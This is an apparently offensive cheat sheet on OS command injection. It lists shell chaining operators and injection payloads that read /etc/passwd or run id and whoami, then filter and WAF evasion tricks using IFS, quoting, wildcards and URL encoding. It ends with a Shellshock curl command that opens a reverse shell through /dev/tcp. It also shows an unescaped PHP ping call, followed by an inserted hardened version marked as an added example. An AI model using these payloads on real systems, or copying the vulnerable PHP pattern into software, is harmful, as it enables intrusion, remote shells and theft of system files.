Command Injection (RCE)
🔗 Chaining Commands
Common operators used in Unix-based systems to chain or control command execution:

- `;` (Semicolon): Run multiple commands in sequence, no matter what.
- `&&` (AND): Run the second command only if the first one succeeds.
- `||` (OR): Run the second command only if the first one fails.
- `&` (Background): Run the command in the background.
- `|` (Pipe): Pipe the output of one command into another.
```bash
ls; whoami   # Execute both
ls && whoami # Execute whoami only if ls succeeds
ls || whoami # Execute whoami only if ls fails
ls & whoami  # Execute ls in the background
ls | whoami  # Pipe the output of ls into whoami
```

```bash
# Only Unix supported
`ls`     # `` (backticks)
$(ls)    # $()
{ls,}
{ls,-a}
ls; id   # ; chains commands
# Does not execute a command itself, but may still be interesting
> /var/www/html/out.txt # Try to redirect the output to a file
< /etc/passwd           # Try to send some input to the command
```

Other Useful Tricks
- `` `cmd` ``: Run a command and substitute its output (backticks).
- `$(cmd)`: Same as above, but more readable (modern syntax).
- `> file`: Write command output to a file (overwrite).
- `>> file`: Append command output to a file.
- `< file`: Use a file as input to a command.
- `$IFS`: Replace space with the Internal Field Separator (used to bypass filters).
- `%0a` / `\n`: Inject a newline (useful in URLs or headers).
- `#`: Comment out the rest of the line (bypass appended code).
- `cat<<EOF`: Inject multi-line input (heredoc).

🧨 Filter Bypass
If user input is not properly escaped before being placed in a shell command, an attacker can execute an illegitimate command:
```php
<?php
// Vulnerable code: $target is interpolated unescaped into a shell command line
$target = $_POST['ip'];
system("ping -c 4 $target");
```
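A hardened counterpart to the snippet above, as an added example that is not part of the original page: the target is allow-listed as an IP address with `filter_var()`, and `ping` is started through `proc_open()` with an argv array, so no shell ever parses the value. The function name `pingHost` and the sample inputs are constructed for this illustration.

```php
<?php
// Hardened version of the vulnerable snippet (added example, not from the original page).
// Two defenses are combined: allow-list validation of the input, and running the
// binary without a shell, so shell metacharacters never reach an interpreter.

function pingHost(string $target): string
{
    // 1. Allow-list: only a syntactically valid IPv4/IPv6 literal is accepted.
    //    Anything carrying ; | & ` $ ( ) or a newline is rejected here.
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('target must be an IP address');
    }

    // 2. No shell: proc_open() with an array argv (PHP >= 7.4) executes the
    //    program directly, so no command-line parsing happens at all.
    //    If a shell were unavoidable, escapeshellarg() would wrap the value,
    //    but validation stays the primary control.
    $descriptors = [
        1 => ['pipe', 'w'], // stdout
        2 => ['pipe', 'w'], // stderr
    ];
    $proc = proc_open(['ping', '-c', '4', $target], $descriptors, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('failed to start ping');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed inputs, as they might arrive (already URL-decoded) in $_POST['ip']:
foreach (['127.0.0.1', '127.0.0.1; id', '$(id)', "127.0.0.1\nid"] as $input) {
    try {
        pingHost($input);
        echo "accepted: " . json_encode($input) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: " . json_encode($input) . "\n";
    }
}
```

Only the first input passes validation; the other three are rejected before any process is started.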
# Basic
127.0.0.1 |ls
|ls
;|ls
;ls
&id
&&|ls
||ls
# print like error in output
`cat /etc/passwd`
$(id)
# IFS tricks
ls${IFS}-aQuotes & Slash
```bash
"w""ho""ami"
i'''d
i"""d
w\ho\am\i
/\b\i\n////sh
/\b\i\n/////s\h
```

Url Encode
```bash
ls %0a id            # %0A
ls %09 id
ls%0B id
ls%0Cid
127.0.0.1%0a id      # LF and whitespace
127.0.0.1%0d%0aid    # CRLF
8.8.8.8%26ls         # 8.8.8.8&ls
8.8.8.8%3Bls         # 8.8.8.8;ls
invalid%7C%7Cwhoami  # invalid||whoami
# Output appears in the response (e.g. inside an error message)
%3E(whoami)          # >(whoami)
%60id%60             # `id`
```

🛡️ WAF Evasion
```bash
$0 -c "whoami"                # $0 = /bin/bash
ls$((123-123))-a              # Arithmetic bypass
${PWD:0:1}bin${PWD:0:1}bash   # String slicing
$(echo l$(echo s))            # Obfuscate
```

```bash
# Wildcard
cat /e?c/p?ss??
cat /e??/??ss*
# $()
who$()ami
# Backslash + Newline
$ cat /et\
c/pa\
sswd
# URL-encoded form: cat%20/et%5C%0Ac/pa%5C%0Asswd
```

🐚 Shellshock
```bash
() { :;}; echo exploit
```

```bash
# Exploit
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ip/port 0>&1" http://example.com/
```